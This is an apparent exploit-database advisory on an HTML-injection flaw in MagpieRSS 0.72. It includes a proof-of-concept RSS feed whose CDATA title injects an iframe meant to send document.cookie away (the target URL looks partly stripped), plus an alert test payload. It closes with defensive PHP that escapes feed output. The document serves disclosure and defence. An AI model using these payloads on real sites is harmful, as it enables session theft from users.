MagpieRSS 0.72 CDATA HTML Injection Vulnerability

EDB-ID: 32686
CVE: N/A
OSVDB-ID: 52039
Author: system_meltdown
Published: 2008-12-29

MagpieRSS is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.

Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

MagpieRSS 0.72 is vulnerable; other versions may also be affected.

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="">

<title><![CDATA["><iframe src="javascript:window.location=&#039;;+document.cookie"></iframe><a lol="]]></title>
<description>XSS test</description>

<link><![CDATA[what teh hax?!]]></link>

"><iframe src="javascript:alert(/xss/)"></iframe>
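
On the consuming side, the fix is to treat every parsed feed field as untrusted text when it is written into a page. The following is an added example, not MagpieRSS code or code from the original advisory: the helper names (esc, safe_href, render_item) and the $items array are assumptions, with sample values constructed from the proof of concept above to stand in for parsed feed items.

```php
<?php
// Added example, not MagpieRSS code. $items is constructed sample data that
// mimics a parsed feed: one item built from the PoC above, one ordinary item.
$items = [
    [
        'title'       => '"><iframe src="javascript:alert(/xss/)"></iframe><a lol="',
        'link'        => 'javascript:alert(/xss/)',
        'description' => 'XSS test',
    ],
    [
        'title'       => 'Release notes & fixes',
        'link'        => 'https://example.org/news?id=1&lang=en',
        'description' => 'Ordinary item',
    ],
];

// Escape for HTML text nodes and quoted attribute values.
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Accept only absolute http/https URLs; everything else (javascript:, data:,
// relative or unparsable values) collapses to an inert "#".
function safe_href(string $url): string
{
    $url = trim($url);
    $scheme = parse_url($url, PHP_URL_SCHEME);
    if (!is_string($scheme) || !in_array(strtolower($scheme), ['http', 'https'], true)) {
        return '#';
    }
    return esc($url);
}

// Every feed field passes through esc() or safe_href() before it reaches HTML.
function render_item(array $item): string
{
    return sprintf(
        '<li><a href="%s" rel="noopener noreferrer">%s</a><p>%s</p></li>',
        safe_href($item['link'] ?? ''),
        esc($item['title'] ?? ''),
        esc($item['description'] ?? '')
    );
}

foreach ($items as $item) {
    echo render_item($item), "\n";
}
```

Escaping the description shows any markup in it as literal text; a site that needs to render feed HTML has to run it through an allowlist-based HTML sanitizer instead of echoing it raw.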